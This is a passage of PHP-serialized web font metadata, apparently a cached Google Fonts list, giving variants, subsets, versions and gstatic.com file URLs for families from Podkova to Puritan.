regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWtFzcU4EoporSHH.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWt3zcU4EoporSHH.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWubysU4EoporSHH.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWuiysU4EoporSHH.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWvFysU4EoporSHH.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1090;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Poiret One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/poiretone/v14/UqyVK80NJXN4zfRgbdfbk5lWVscxdKE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1091;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Poller One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/pollerone/v19/ahccv82n0TN3gia5E4Bud-lbgUS5u0s.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1092;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Poly\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/poly/v16/MQpb-W6wKNitRLCAq2Lpris.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/poly/v16/MQpV-W6wKNitdLKKr0DsviuGWA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1093;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Pompiere\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/pompiere/v15/VEMyRoxis5Dwuyeov6Wt5jDtreOL.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1094;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Pontano Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/pontanosans/v13/qFdD35GdgYR8EzR6oBLDHa3qwjUMg1siNQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1095;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Poor Story\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/poorstory/v20/jizfREFUsnUct9P6cDfd4OmnLD0Z4zM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1096;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Poppins\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrLPTed3FBGPaTSQ.ttf\";s:9:\"100italic\";s:75:\"http://fonts.gstatic.com/s/poppins/v20/pxiAyp8kv8JHgFVrJJLmE3tFOvODSVFF.ttf\";s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLFj_V1tvFP-KUEg.ttf\";s:9:\"200italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmv1plEN2PQEhcqw.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLDz8V1tvFP-KUEg.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm21llEN2PQEhcqw.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/poppins/v20/pxiEyp8kv8JHgFVrFJDUc1NECPY.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrJJLed3FBGPaTSQ.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLGT9V1tvFP-KUEg.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmg1hlEN2PQEhcqw.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLEj6V1tvFP-KUEg.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmr19lEN2PQEhcqw.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLCz7V1tvFP-KUEg.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmy15lEN2PQEhcqw.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLDD4V1tvFP-KUEg.ttf\";s:9:\"800italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm111lEN2PQEhcqw.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLBT5V1tvFP-KUEg.ttf\";s:9:\"900italic\";s:77:\"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm81xlEN2PQEhcqw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1097;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Port Lligat Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/portlligatsans/v18/kmKmZrYrGBbdN1aV7Vokow6Lw4s4l7N0Tx4xEcQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1098;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Port Lligat Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/portlligatslab/v21/LDIpaoiQNgArA8kR7ulhZ8P_NYOss7ob9yGLmfI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1099;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Potta One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/pottaone/v16/FeVSS05Bp6cy7xI-YfxQ3Z5nm29Gww.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1100;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Pragati Narrow\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/pragatinarrow/v13/vm8vdRf0T0bS1ffgsPB7WZ-mD17_ytN3M48a.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/pragatinarrow/v13/vm8sdRf0T0bS1ffgsPB7WZ-mD2ZD5fd_GJMTlo_4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1101;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Praise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/praise/v5/qkBUXvUZ-cnFXcFyDvO67L9XmQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1102;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Prata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/prata/v18/6xKhdSpbNNCT-vWIAG_5LWwJ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1103;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Preahvihear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/preahvihear/v27/6NUS8F-dNQeEYhzj7uluxswE49FJf8Wv.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1104;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Press Start 2P\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/pressstart2p/v14/e3t4euO8T-267oIAQAu6jDQyK0nSgPJE4580.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1105;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Pridi\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:69:\"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1SiE0jRUG0AqUc.ttf\";s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc02i00jRUG0AqUc.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/pridi/v11/2sDQZG5JnZLfkfWao2krbl29.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1uik0jRUG0AqUc.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1CjU0jRUG0AqUc.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc0mjE0jRUG0AqUc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1106;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Princess Sofia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/princesssofia/v21/qWczB6yguIb8DZ_GXZst16n7GRz7mDUoupoI.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1107;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Prociono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/prociono/v22/r05YGLlR-KxAf9GGO8upyDYtStiJ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1108;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Prompt\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:70:\"http://fonts.gstatic.com/s/prompt/v10/-W_9XJnvUD7dzB2CA9oYREcjeo0k.ttf\";s:9:\"100italic\";s:73:\"http://fonts.gstatic.com/s/prompt/v10/-W_7XJnvUD7dzB2KZeJ8TkMBf50kbiM.ttf\";s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cr_s4bmkvc5Q9dw.ttf\";s:9:\"200italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLQb2MrUZEtdzow.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cy_g4bmkvc5Q9dw.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeK0bGMrUZEtdzow.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB26Z9AcZkIzeg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/prompt/v10/-W_9XJnvUD7dzB2KZdoYREcjeo0k.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Ck_k4bmkvc5Q9dw.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLsbWMrUZEtdzow.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cv_44bmkvc5Q9dw.ttf\";s:9:\"600italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLAamMrUZEtdzow.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2C2_84bmkvc5Q9dw.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeKka2MrUZEtdzow.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cx_w4bmkvc5Q9dw.ttf\";s:9:\"800italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeK4aGMrUZEtdzow.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2C4_04bmkvc5Q9dw.ttf\";s:9:\"900italic\";s:74:\"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeKcaWMrUZEtdzow.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1109;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Prosto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/prostoone/v17/OpNJno4VhNfK-RgpwWWxpipfWhXD00c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1110;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Proza Libre\";s:8:\"variants\";a:10:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":10:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjGdGHgj0k1DIQRyUEyyHovftvXWYyz.ttf\";s:6:\"italic\";s:80:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjEdGHgj0k1DIQRyUEyyEotdN_1XJyz7zc.ttf\";s:3:\"500\";s:81:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyELbV__fcpC69i6N.ttf\";s:9:\"500italic\";s:84:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTCvceJSY8z6Np1k.ttf\";s:3:\"600\";s:81:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEL3UP_fcpC69i6N.ttf\";s:9:\"600italic\";s:84:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTAfbeJSY8z6Np1k.ttf\";s:3:\"700\";s:81:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEKTUf_fcpC69i6N.ttf\";s:9:\"700italic\";s:84:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTGPaeJSY8z6Np1k.ttf\";s:3:\"800\";s:81:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEKPUv_fcpC69i6N.ttf\";s:9:\"800italic\";s:84:\"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTH_ZeJSY8z6Np1k.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1111;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Public Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpi5ww0pX189fg.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulpm5ww0pX189fg.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuSJm5ww0pX189fg.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpm5ww0pX189fg.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuJJm5ww0pX189fg.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuyJ65ww0pX189fg.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymu8Z65ww0pX189fg.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulp65ww0pX189fg.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuv565ww0pX189fg.ttf\";s:9:\"100italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgQctfVotfj7j.ttf\";s:9:\"200italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRgActfVotfj7j.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673toPgActfVotfj7j.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgActfVotfj7j.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpjgActfVotfj7j.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tqPhwctfVotfj7j.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tq2hwctfVotfj7j.ttf\";s:9:\"800italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRhwctfVotfj7j.ttf\";s:9:\"900italic\";s:98:\"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tr4hwctfVotfj7j.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1112;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Puppies Play\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/puppiesplay/v5/wlp2gwHZEV99rG6M3NR9uB9vaAJSA_JN3Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1113;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Puritan\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/puritan/v24/845YNMgkAJ2VTtIo9JrwRdaI50M.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/puritan/v24/845aNMgkAJ2VTtIoxJj6QfSN90PfXA.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/puritan/v24/845dNMgkAJ2VTtIozCbfYd6j-0rGRes.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/puritan/v24/845fNMgkAJ2VTtIoxJjC_dup_2jDVevnLQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1114;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Purple 